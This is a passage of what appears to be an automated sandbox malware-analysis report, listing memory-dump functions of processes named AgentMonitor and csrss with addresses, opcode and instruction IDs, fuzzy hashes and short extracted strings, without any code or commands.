                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE23B50 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                      Function 00007FFB4AE246B2 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 0070a4db9c6702c52058f24c164babd924dd2ad746f39f15433760fc5179e36d
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: 7BE04F73A8C41687E765BE20C5515BA3387BFD4354F3402F6D02A871C1EDBC66068642
                                      Function 00007FFB4AE154B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 0ee713b78647d20b527666bb102ad91e0ec0da5f6ac01c6a044c92693e35cf69
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 97E0ED70A4C1368AFB94BD24D9507B966A4FB85310F7440F89A5E933C2DD29AE448745
                                      Function 00007FFB4AE4D6F9 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction ID: 45e2eebe902de0fd7e1acde84c48574b031983042b5d42cafd33742a365dc4fd
                                      • Opcode Fuzzy Hash: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction Fuzzy Hash: 2AE01A6294E7C44FC74BAB3488A89417F64AE1721174A40EBC085CF1F3D9199849C711
                                      Function 00007FFB4AE41E10 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Function 00007FFB4AE46D78 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction ID: 9de1e2994fea26cdf7ad3255474e1c9d0e7d0ee054989b0168b0aa26bfda795c
                                      • Opcode Fuzzy Hash: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction Fuzzy Hash: 26D01234B949044F870CBA38C85D8747395EB6A2177E544A9D00AC72B1D96ADC89CB81
                                      Function 00007FFB4AE4B618 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction ID: 8f09ab4a651fb39573b1301ec7c35e3ecac32723bf79141849bfce3baf0314c2
                                      • Opcode Fuzzy Hash: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction Fuzzy Hash: 2ED01234B949044F8B0CBE38C8998747395EB6A216BA540E9D00AC72B1D96ADC89C741
                                      Function 00007FFB4AE106AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Function 00007FFB4AE112B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Function 00007FFB4AE136E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66fd9c95d9fb302f4d8d08252d0259f79ed687d58519ba32e8e14782fa9f980c
                                      • Instruction ID: 0982063ab03a394c61e729939bbac197cca64aa79e58cad3533420b5371e1b8e
                                      • Opcode Fuzzy Hash: 66fd9c95d9fb302f4d8d08252d0259f79ed687d58519ba32e8e14782fa9f980c
                                      • Instruction Fuzzy Hash: 00C08CC0F0EC2B53F12B3628D12127E0842AF40700FE00078E42ED22CECE0E1A221282
                                      Function 00007FFB4AE106D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Function 00007FFB4AE11958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 00007FFB4AE109B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction ID: b025d66e3f5e36446bec3f6354de4736c738368f86a47395ebb5d53150d88d65
                                      • Opcode Fuzzy Hash: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction Fuzzy Hash: 1151C2D7A0E63285E11336FCF4011FD5B4C9F81275B1886B7DA4E990878E8861BB92F5

                                      Executed Functions

                                      Function 00007FFB4AE41125 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J
                                      • API String ID: 0-1141589763
                                      • Opcode ID: 5c363210d357920768efaa46cdcca892555f6eb628b906d8214fd3f2584d20d9
                                      • Instruction ID: 256170b4019ee19852dc022ccac989accb25b277283034550e45dbba04e8e77d
                                      • Opcode Fuzzy Hash: 5c363210d357920768efaa46cdcca892555f6eb628b906d8214fd3f2584d20d9
                                      • Instruction Fuzzy Hash: C2C19A61A9D6760BE71D7E388E420B5779EFBD2201B3886BDD4EBC7187D91CE4034281
                                      Function 00007FFB4AE10D48 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: d6c6823b2c7a7c60ce6cb95b0cddb8aa01e8b76b731bf26d5e222ec12cad5b0f
                                      • Instruction ID: aae0c090b9afd0ebc8d6e40d4d6b4219851619a35a58496ce3c41d3186150d0f
                                      • Opcode Fuzzy Hash: d6c6823b2c7a7c60ce6cb95b0cddb8aa01e8b76b731bf26d5e222ec12cad5b0f
                                      • Instruction Fuzzy Hash: 129101B191CAA98FE789EF68C8697A97FF0FF59300F1401BAC049D73DADA7814118B51
                                      Function 00007FFB4AE21142 Relevance: 9.7, Strings: 7, Instructions: 917COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HKJ$HVJ$X_J$`[J$hIJ$hxJ$pJ
                                      • API String ID: 0-2008210366
                                      • Opcode ID: f7ec922c361c9139b2f6e4c2d636134415f4f8b3632b64421297173e1d6f78e9
                                      • Instruction ID: 121f525909fd363ad1944696becf66072c1e350dec6b29fe3dc13bd1404f19bd
                                      • Opcode Fuzzy Hash: f7ec922c361c9139b2f6e4c2d636134415f4f8b3632b64421297173e1d6f78e9
                                      • Instruction Fuzzy Hash: 1A62B3B2A1D95A4FE798FF38C5616B877A6FF98300F2401F9D41DC3286DD28AD468781
                                      Function 00007FFB4AE43515 Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J_H
                                      • API String ID: 0-326533465
                                      • Opcode ID: 58805a8b8b1bca911b947301df07efadea700f074ae10e24db45f2511fcdaeb6
                                      • Instruction ID: 7948e19ce257e52cb130a5082857ef7c98e258e2d0c447f6ce093ef81894be7c
                                      • Opcode Fuzzy Hash: 58805a8b8b1bca911b947301df07efadea700f074ae10e24db45f2511fcdaeb6
                                      • Instruction Fuzzy Hash: 1E91E0A1A1CA5B4EF688FE38C4562B976DDFF98300F2441F9D85DC328BDD2868468381
                                      Function 00007FFB4AE108D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 49c19e905919c7226128ba3381d1932795e682e830d38bdbacb244e633da0378
                                      • Instruction ID: 2bc67c93ce632f04c18d93e278f2fd402c868dff032bb8a1c2a8df3873fda0fc
                                      • Opcode Fuzzy Hash: 49c19e905919c7226128ba3381d1932795e682e830d38bdbacb244e633da0378
                                      • Instruction Fuzzy Hash: 18418CA2A0D6714EE306BB78E09A1FD7F94EF45334B2440FFC84EC7197DD0868528291
                                      Function 00007FFB4AE10960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: c336f5df865333d7d1235b5d6f897663f23420fcb8c34d06456a1e419f376855
                                      • Instruction ID: 522086e1f1d421bc1bb0179541fdbf8423046a251fd6a6dd7601a879c4b9eadc
                                      • Opcode Fuzzy Hash: c336f5df865333d7d1235b5d6f897663f23420fcb8c34d06456a1e419f376855
                                      • Instruction Fuzzy Hash: 5C3179B1A0EA661FF359BE78E48A5F97BC5EF44320B6401FED80EC71D7CC18684242A1
                                      Function 00007FFB4AE10998 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: e4a77068927cd0cc241919839b75a4ec3a07b51fbbc64f4aba913ac08b7b5c3a
                                      • Instruction ID: 864a29e9eee08925b159cddf1acb8ec7ffbdf25d81dab8306a6bc528dad6a90a
                                      • Opcode Fuzzy Hash: e4a77068927cd0cc241919839b75a4ec3a07b51fbbc64f4aba913ac08b7b5c3a
                                      • Instruction Fuzzy Hash: F13104B0A1D9691FE748FE38C09A6B97BD6EF58310B6401FDD80EC3297DC18A8428291
                                      Function 00007FFB4AE43049 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction ID: a22ddae03843cab328321067345e9ea6eab528daaf545d61559a51b261fc2575
                                      • Opcode Fuzzy Hash: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction Fuzzy Hash: 2FF0656154E7C44FC716EA7488694557F60EF6721174A46EFC045CF1A3DA1D8C89C741
                                      Function 00007FFB4AE41D69 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction ID: e81f38eb0dd38b7ecaa1100520948066fd7da0e4314703f698e60b83ea8287eb
                                      • Opcode Fuzzy Hash: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction Fuzzy Hash: 80F065A154E7D04FCB16AA7488644557F64EF6720174A41EEC055CF1A7DA1DCC45C741
                                      Function 00007FFB4AE43EA9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: e0be18d257417df236fcc11270a313c7eff2825d88ca2dad7ae1958de12883c5
                                      • Instruction ID: 5aba71167015c4cd3437230aeb1c337be68d030628d3c875fe7738e31c07f3c1
                                      • Opcode Fuzzy Hash: e0be18d257417df236fcc11270a313c7eff2825d88ca2dad7ae1958de12883c5
                                      • Instruction Fuzzy Hash: 56E01AA144F7D04FCB16EF7488669847FA0EE6B21078A40EEC086CF1F3E62D884AC711
                                      Function 00007FFB4AE47FF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 0923374b07e7562a50073bc70c4024c6f87ee00ea6365cb7f9c0a44157c86ad6
                                      • Instruction ID: b93b4db01bcfaf825da838150498bcb20557062491ad12b1cd2106eff28bfb05
                                      • Opcode Fuzzy Hash: 0923374b07e7562a50073bc70c4024c6f87ee00ea6365cb7f9c0a44157c86ad6
                                      • Instruction Fuzzy Hash: 64E01AA154E7D04FDB0AAF7488658443FA0EE6B25178B40EEC185CF1F3E62D8C49C711
                                      Function 00007FFB4AE41DF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: c684d71a9b9eeb7e7ae76472557dc958890243a0f70d199c16aa8758a383a113
                                      • Instruction ID: cd78cf4ed60cd66d7890b0e60c129ecb6dc8d58320db06e70792f71a2db1c347
                                      • Opcode Fuzzy Hash: c684d71a9b9eeb7e7ae76472557dc958890243a0f70d199c16aa8758a383a113
                                      • Instruction Fuzzy Hash: 87E01AA154E7E04FCB16AA7488659453FA4EE6B21178A40EEC045CF1A3E62DC84AC741
                                      Function 00007FFB4AE4A879 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 95b29c45fdc390b121aeef7cbf92d142b6629b91a2496aaa5d142149635a457b
                                      • Instruction ID: 380bbaed15bd81d06552504bee7a3d08fe52395b51a7c4703365778288f4c253
                                      • Opcode Fuzzy Hash: 95b29c45fdc390b121aeef7cbf92d142b6629b91a2496aaa5d142149635a457b
                                      • Instruction Fuzzy Hash: 5BE0E56294E7C44FCB1AAA3488699547FA0AE6B21178A40EEC045CB1A3E62D9849C701
                                      Function 00007FFB4AE4AE55 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c46957cb22ff8b75accd22cefdfd647835b0ea5f68273f280c0f15266dc6bb8
                                      • Instruction ID: e52c5fa8c6873ebaeba5ab6b8fe467543d73b02e2248e3ac38cb8827f549b5cf
                                      • Opcode Fuzzy Hash: 0c46957cb22ff8b75accd22cefdfd647835b0ea5f68273f280c0f15266dc6bb8
                                      • Instruction Fuzzy Hash: CA31C4E1A1DD6B4FE689FF38C5952B826DDFB98310BB400F9D45DC328ADC286C455341
                                      Function 00007FFB4AE10908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 973cd82c01224f201391db865d50190ccd7ba8ea30c81ac30c4862974add1702
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 2D21B63130C8184FD768FE1CE889EB977D5FB5932171501BAE59AC7226D911EC8287C1
                                      Function 00007FFB4AE1116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 437c3fbeed57271bcf99c7109c40f8dc1724866863a266c7370b00067abed11f
                                      • Instruction ID: 37fee7888af6b99f376ee4a82e2ae69b2b922b7739ac0c05f3b819c948be7384
                                      • Opcode Fuzzy Hash: 437c3fbeed57271bcf99c7109c40f8dc1724866863a266c7370b00067abed11f
                                      • Instruction Fuzzy Hash: 4D31AF71A0D65A8FDB45FF78C8549B97BE0FF59310B2405FAC01AD72A2DB29A441CB40
                                      Function 00007FFB4AE10C25 Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 673e5f9744fe627961f8af8a7297823dc1d7a3afdef8ee5b231e9e1e3d5adcf6
                                      • Instruction ID: 974b50c8666947e9088af8039315baf181a23fec360c5d113aa71021d0657cf3
                                      • Opcode Fuzzy Hash: 673e5f9744fe627961f8af8a7297823dc1d7a3afdef8ee5b231e9e1e3d5adcf6
                                      • Instruction Fuzzy Hash: 4811C0B5A4C66A8BF312BF34C9112BC7F64EF42364F3581F2C0558B1C2D92825478B91
                                      Function 00007FFB4AE424E6 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
